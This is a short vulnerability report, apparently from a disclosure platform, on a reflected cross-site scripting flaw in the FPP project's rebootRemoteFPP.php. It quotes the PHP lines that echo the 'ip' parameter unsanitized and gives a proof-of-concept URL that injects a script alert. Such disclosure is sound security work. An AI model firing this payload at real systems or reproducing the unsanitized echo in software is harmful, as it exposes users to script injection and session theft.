Cross-site Scripting (XSS) - Reflected in falconchristmas/fpp
Valid
Reported on
May 29th 2021
✍️ Description
Hi, in https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/rebootRemoteFPP.php#L15
the variable ip
is reflected without prior sanitization :
$ip = $_GET['ip'];
echo "Rebooting FPP system @ $ip\n";
🕵️♂️ Proof of Concept
Visit : http://127.0.0.1/rebootRemoteFPP.php?ip=%3Cscript%3Ealert(%27zer0h%27)%3C/script%3E
💥 Impact
XSS
Occurrences
to join this conversation